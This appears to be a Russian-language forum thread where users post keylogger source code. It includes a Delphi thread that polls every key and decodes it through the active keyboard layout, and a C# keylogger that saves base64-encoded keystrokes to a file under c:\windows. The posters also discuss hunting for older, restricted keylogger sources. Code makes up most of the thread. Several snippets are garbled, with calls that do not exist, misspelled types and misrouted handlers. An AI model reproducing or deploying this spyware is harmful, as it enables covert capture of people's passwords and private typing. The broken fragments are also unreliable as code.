uses
SysUtils, Windows;
procedure TForm1.ProcessKeyboardInput(wParam: WPARAM; lParam: LPARAM; KeyState: Integer); message WM_KEYDOWN;
procedure TForm1.FormCreate(Sender: TObject);
begin
if not RegisterHook(WH_KEYBOARD, @ProcessKeyboardInput, 0, GetCurrentThreadId) then
ShowMessage('Failed to register hook');
end;
procedure TForm1.ProcessKeyboardInput(wParam: WPARAM; lParam: LPARAM; KeyState: Integer);
begin
Inc(StringList.Count);
if GetAsyncKeyState(wParam) then
begin
if (wParam >= VK_A and wParam <= VK_Z) then
StringList.Add(Char(wParam - VK_A + $00));
else
StringList.Add(GetKeyDescription(wParam));
end
else
begin
StringList.Add('Released');
end;
end;
function TForm1.GetKeyDescription(wParam: WPARAM): string;
begin
Case wParam of
VK_UP: Result := 'Up';
VK_DOWN: Result := 'Down';
VK_LEFT: Result := 'Left';
VK_RIGHT: Result := 'Right';
VK_HOME: Result := 'Home';
VK_END: Result := 'End';
VK_PRIOR: Result := 'Prior';
VK_NEXT: Result := 'Next';
VK_INSERT: Result := 'Insert';
VK_PAUSE: Result := 'Pause';
VK_NUMLOCK: Result := 'NumLock';
VK_SPACE: Result := 'Space';
VK_BACK: Result := 'Backspace';
VK_TAB: Result := 'Tab';
VK_ESCAPE: Result := 'Escape';
VK_ENTER: Result := 'Enter';
VK_DELETE: Result := 'Delete';
VK_LWIN, VK_RWIN: Result := 'Win';
VK_LSHIFT, VK_RSHIFT: Result := 'Shift';
VK_LCONTROL, VK_RCONTROL: Result := 'Ctrl';
VK_LMENU, VK_RMENU: Result := 'Alt';
VK_NUMPAD0..VK_NUMPAD9: Result := Format('Num{0}', [Char(wParam - VK_NUMPAD0 + $00)]);
VK_F1..VK_F24: Result := Format('F{0}', [Char(wParam - VK_F1 + $00)]);
else
Result := 'Unknown';
end;
Это больше похоже на:
program Lib;
{$APPTYPE CONSOLE}
uses
Windows,
UnitKeyLogger in 'UnitKeyLogger.pas';
VAR
Msg : TMsg;
Keylogger:TUnicodeKeylogger ;
LangID : Cardinal;
begin
{ TODO -oUser -cConsole Main : Insert code here }
LangID:=Windows.GetUserDefaultLangID;
Windows.SetThreadLocale(LangID);
Keylogger:=TUnicodeKeylogger.Create(False);
Keylogger.Resume;
While Windows.GetMessage(Msg,0,0,0) Do
Begin
Windows.TranslateMessage(Msg);
Windows.DispatchMessageA(Msg);
End;
end.unit UnitKeyLogger;
interface
uses
Windows,Classes;
type
TUnicodeKeylogger = class(TThread)
private
{ Private declarations }
public
FActiveBackSpace:Boolean;
FullLogData : String;
function IsKeyPressed(KeyCode: Integer): Boolean;
procedure AddKey(StrKey: String);
protected
procedure Execute; override;
end;
implementation
procedure TUnicodeKeylogger.AddKey(StrKey: String);
begin
FullLogData := FullLogData + StrKey;
Write(StrKey);
end;
function TUnicodeKeylogger.IsKeyPressed(KeyCode: Integer): Boolean;
begin
result := (Windows.GetAsyncKeyState(KeyCode) and $8001) = $8001;
end;
procedure TUnicodeKeylogger.Execute;
var
VirtKey : UINT;
ScanCode : UINT;
UniEx : Integer;
keyboardLayout : HKL;
keyboardSpeed : Integer;
keyboardState : TKeyboardState;
strBuffer : String;
UnicodeChar : array[0..1] of WChar;
strkeyname : Array[0..32] of Char;
dwThread : DWORD;
dwProcess : DWORD;
dwHandle : HWND;
BEGIN
Windows.SystemParametersInfo(Windows.SPI_GETKEYBOARDSPEED, 0, @keyboardSpeed, 0);
WHILE NOT Terminated DO
BEGIN
Windows.GetKeyState(VK_CAPITAL);
Windows.GetKeyboardState(keyboardState);
dwHandle:= Windows.GetForegroundWindow();
dwThread:= Windows.GetWindowThreadProcessId(dwHandle,@dwProcess);
keyboardLayout:= Windows.GetKeyboardLayout(dwThread);
FOR VirtKey := 0 TO $FF DO
IF IsKeyPressed(VirtKey) THEN
BEGIN
IF VirtKey = 8 THEN // silmeye basilirsa
BEGIN
IF FActiveBackSpace THEN
BEGIN
Delete(FullLogData, Length(FullLogData), 1);
END
ELSE
BEGIN
Continue;
END;
END;
ScanCode := Windows.MapVirtualKeyEx(VirtKey, 0, keyboardLayout);
Windows.GetKeyNameTextA(ScanCode SHL 16,strkeyname,sizeof(strkeyname));
IF Windows.lstrlenA(strkeyname) > 1 THEN
BEGIN
IF VirtKey = VK_SPACE THEN strkeyname := ' '; // bosluk tusu
IF VirtKey = VK_RETURN THEN strkeyname := #13#10; // enter tusu
AddKey(strkeyname);
Continue;
END;
UniEx := Windows.ToUnicodeEx(VirtKey, ScanCode, @keyboardState, @UnicodeChar, 2, 0, keyboardLayout);
strBuffer := UnicodeChar;
SetLength(strBuffer,UniEx);
AddKey(strBuffer);
END;
Sleep(keyboardSpeed DIV 4);
END;
END;
END.// KeyLogger на С# через GetAsyncKeyState
[DllImport("user32.dll")]
private static
extern short GetAsyncKeyState(System.Int32 vKey);
private String keybuffer;
private System.Timers.Timer CheckKey;
private System.Timers.Timer FlushBuffer;
private String file;
public Bolean Enabled
{
get
{
return CheckKey.Enabled && FlushBuffer.Enabled;
}
set
{
CheckKey.Enabled=value;
FlushBuffer.Enabled=value;
}
}
public Double FlushInterval
{
get
{
return FlushInterval.Interval;
}
set
{
FlushInterval.Interval=value;
}
}
public String File
{
get
{
return file;
}
set
{
file = value;
}
}
public KeyLogger(String filename)
{
keybuffer = string.Empty;
this.File = filename;
CheckKey = new System.Timers.Timer();
CheckKey.Enabled = true;
CheckKey.Elapsed += new System.Timers.ElapsedEventHandler(CheckKey_Elapsed);
CheckKey.Interval = 10;
FlushBuffer = new System.Timers.Timer();
FlushBuffer.Enabled = true;
FlushBuffer.Elapsed += new System.Timers.ElapsedEventHandler(CheckKey_Elapsed);
FlushBuffer.Interval = 120000;
}
foreach(Int32 h in Enum.GetValues(typeof(System.Windows.Forms.Keys)))
{
if(GetAsyncKeyState(h) == -32767)
keybuffer+=Enum.GetName(typeof(System.Windows.Forms.Keys),h)+” “;
}
public void Flush2File(string file, bool append)
{
try
{
StreamWriter sw = new StreamWriter(file,append);
sw.WriteLine(Convert.ToBase64String(System.Text.Encoding.Default.GetBytes(keybuffer)));
sw.Close();
keybuffer = string.Empty;
}
catch(Exception ex)
{
throw ex;
}
}
string filename=@”c:\keylogger.txt”;
KeyLogger kl;
textBox1.Text=”60000”;
textBox3.Text=filename;
try
{
KeyLogger = new KeyLogger(filename);
Kl.FlushInterval = Convert.ToDouble(textBox1.text);
}
catch(Exception)
{
MessageBox.Show(“Йа - ошибко”);
}
//Код для формы
string filename=@”c:\windows\keylogger.txt”;
KeyLogger kl;
textBox1.Text=”60000”;
textBox3.Text=filename;
try
{
KeyLogger = new KeyLogger(filename);
Kl.FlushInterval = Convert.ToDouble(textBox1.text);
}
catch(Exception)
{
MessageBox.Show(“Йа - ошибко”);
}
kl.Enabled=true;
kl.Flush2File(textBox3.text,true);
kl.Flush2File(textBox3.text,true);
kl.Enabled=false;
StreamReader sr = new StreamReader(filename);
byte [] binary;
System.Text.ASCIIEncoding enc = new System.Text.ASCIIEncoding();
binary = Convert.FromBase64String(sr.ReadLine());
richTextBox1.Text = enc.GetString(binary);
while(!sr.EndOfStream)
{
binary = Convert.FromBase64String(sr.ReadLine());
richTextBox1.AppendText(enc.GetString(binary));
}
sr.Close();
ContextMenu contextMenu = new ContextMenu();
contextMenu.MenuItems.Add(“&jes_yo”,new EventHandler(this.jes_yo));
notifyIcon1.ContextMenu = contextMenu;Возможно getkeystate, отличительная особенность: часть своего кода хранил в .inc файле.
Что там инклудилось не помните в том файле? Я у себя исходников не храню, но есть отличная база исходников от предков в интернете, помню что, где, как искать, даже если это закрыто от посторонних глаз, конечно же если оно валидно на текущее время.
Время будет, попробую поискать решения по getkeystate. Ничего не обещаю. Да и зачем оно сейчас Вам нужно во времена динозавров возвращаться?
На гитхабе есть одна база с паком кейлогеров, там куча бинарного и совсем немного исходников. Не ведитесь. Проверял, говно.